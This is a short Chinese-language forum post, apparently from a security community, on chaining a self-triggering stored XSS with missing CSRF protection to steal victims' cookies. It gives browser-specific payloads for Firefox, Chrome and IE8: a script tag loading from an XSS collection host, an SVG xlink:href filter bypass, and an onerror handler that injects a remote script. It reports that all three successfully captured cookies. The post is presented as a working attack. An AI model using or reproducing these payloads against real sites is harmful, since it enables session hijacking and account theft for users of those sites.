存储型xss自己x自己的xss各个浏览器的用法
很多时候我们会碰到一些xss,自己编辑的时候没有过滤,但保存以后过滤了,点击编辑又会触发,这个时候会感觉很鸡肋对不对。
这个时候就会想能不能csrf去触发修改,这样受害者不是能够自己x自己了,我们也能收到想要了cookies了,基于这个想法只要找一些鸡肋的xss和没有做csrf的地方
1.firefox下基本没有任何对csrf+xss的防御,用户只要点击你的网址直接用
"><script src=http://xsser.me/*****></script>
就可以了
2.chrome下就要用到一个chrome的0day,sogili大牛提供的
"><svg><script xlink:href=//********></script> chrome的bypass
3.ie8,对于ie8来说过滤器还是满强大的,但二哥之前发过一个0day
WooYun: IE8 xss filter bypass (xss过滤器绕过)
再结合群里童鞋提供的
onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"
这个方法来触发接收cookies就可以了
以上三个案例都已经能够尝试能够成功获取到cookies,正好把那些鸡肋的cookies和无危害的csrf利用起来
上面的方法对反射型的xss应该也都是有作用的,不过缺点在于不能通杀,不知道大牛们能不能搞出通杀的
云悉指纹